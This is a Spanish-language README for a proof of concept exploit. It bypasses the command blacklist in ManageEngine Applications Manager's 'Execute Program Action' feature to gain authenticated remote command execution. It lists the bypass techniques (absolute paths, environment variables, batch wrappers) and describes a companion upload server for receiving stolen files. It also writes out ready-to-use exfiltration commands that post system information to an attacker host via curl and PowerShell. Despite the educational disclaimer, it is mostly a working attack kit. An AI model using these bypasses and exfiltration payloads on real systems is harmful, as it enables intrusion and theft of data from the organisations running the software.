# Applications Manager - Execute Program Action Bypass PoC

![Security Research](https://img.shields.io/badge/Security-Research-red)
![Python 3.x](https://img.shields.io/badge/Python-3.x-blue)
![Proof of Concept](https://img.shields.io/badge/Proof%20of-Concept-orange)

## 📖 Descripción

Este repositorio contiene una Prueba de Concepto (PoC) que demuestra una vulnerabilidad de ejecución de comandos en la función "Execute Program Action" de ManageEngine Applications Manager.

## 🔍 Detalles de la Vulnerabilidad

Applications Manager utiliza una lista negra (`BlackListCommands`) para bloquear comandos peligrosos, pero la validación tiene fallas críticas:

- **Validación basada en cadenas** solo en el primer token
- **Sin normalización de rutas** o expansión de variables de entorno
- **Sin protección** contra ejecución indirecta a través de scripts

## 🚨 Métodos de Bypass

| Método | Ejemplo |
|--------|---------|
| **Ruta Absoluta** | `C:\Windows\System32\netstat.exe` |
| **Variables de Entorno** | `%SystemRoot%\System32\netstat.exe` |
| **Script Wrapper** | `echo netstat > a.bat && a.bat` |

## 💥 Impacto

- ✅ Ejecución Remota de Código (RCE) autenticada en el host de Applications Manager
- ✅ Ejecución completa de comandos del sistema evadiendo restricciones de seguridad
- ✅ Exfiltración de datos usando utilidades del sistema (curl, powershell, certutil)

## 📤 Ejemplo de Payload de Exfiltración

```cmd
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "file=@out.txt" http://[KALI_IP]:8000/upload
```

## 🛠️ Configuración y Uso

### Prerequisitos

- Python 3.x
- Acceso de red a la instancia de Applications Manager objetivo
- Acceso autenticado con permisos de "Execute Program Action"

### Servidor de Carga de Archivos

El script `upload_server.py` proporciona un servidor HTTP simple para recibir archivos exfiltrados.

#### Uso Básico

```bash
python3 upload_server.py
```

#### Opciones Avanzadas

```bash
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
```

#### Parámetros

- `--host`: Dirección de enlace (predeterminado: 0.0.0.0)
- `--port`: Puerto HTTP (predeterminado: 8000)
- `--dir`: Directorio de salida (predeterminado: directorio actual)

### API Endpoints

| Método | Endpoint | Descripción |
|--------|----------|-------------|
| **GET** | `/` | Lista archivos subidos recientemente |
| **POST** | `/upload` | Sube archivos (multipart/form-data) |
| **PUT** | `/upload/[filename]` | Carga directa de archivos |

### Características de Seguridad

✅ Protección contra path traversal  
✅ Nombres de archivo únicos con timestamp  
✅ Registro de solicitudes con IP y User-Agent  
✅ Validación de tipo de contenido  

## 🎯 Comandos de Prueba

Crea un archivo `test_commands.txt` con ejemplos de bypass:

```batch
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "file=@network.txt" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
```

## ⚠️ Aviso Legal

**IMPORTANTE:** Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas.

❌ **NO** usar en sistemas que no posea o no tenga permiso explícito para probar  
❌ **NO** usar para ninguna actividad ilegal  
✅ **SÍ** usar solo en entornos controlados para investigación de seguridad  
✅ **SÍ** obtener autorización adecuada antes de realizar pruebas  

El autor no es responsable de ningún uso indebido de esta herramienta. Los usuarios asumen toda la responsabilidad y el riesgo.

## 📄 Licencia

Este proyecto es solo para fines de investigación y educativos. Todos los derechos reservados.

## 👨‍💻 Autor

Johan Aybar - Con fines educativos

---

**⚠️ RECORDATORIO:** Este PoC debe usarse únicamente en entornos de prueba autorizados. El uso no autorizado puede ser ilegal y está estrictamente prohibido.
